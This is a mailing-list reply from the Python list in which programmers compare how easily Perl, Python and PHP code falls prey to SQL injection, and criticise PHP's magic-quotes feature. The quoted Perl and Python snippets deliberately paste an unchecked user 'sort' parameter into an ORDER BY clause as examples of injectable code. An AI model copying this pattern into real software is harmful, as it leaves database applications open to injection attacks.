Leif K-Brooks wrote:
> John Bokma wrote:
>> my $sort = $cgi->param( "sort" );
>> my $query = "SELECT * FROM table WHERE id=? ORDER BY $sort";
>
> And the equivalent Python code:
>
> cursor.execute('SELECT * FROM table WHERE id=%%s ORDER BY %s' % sort,
> [some_id])
>
> You're right, of course, about being *able* to write code with SQL
> injection vulnerabilities in Python.
I can only speak for Perl for now, but I am sure it has been done, and I
don't want to know how often :-D (Unless everyone who did pays me 1 USD).
> But it's not even close to being as
> easy as in PHP.
I didn't deny that :-) Personally I don't like PHPs "magicaddslashquote"
stuff. It gives beginners the impression that everything is taken care of.
It's like giving someone a house with a door with 7 locks, without telling
all windows at ground level can't be closed (and the master key is under
the doormat)
--
John MexIT: http://johnbokma.com/mexit/
personal page: http://johnbokma.com/
Experienced programmer available: http://castleamber.com/
Happy Customers: http://castleamber.com/testimonials.html
--
http://mail.python.org/mailman/listinfo/python-list
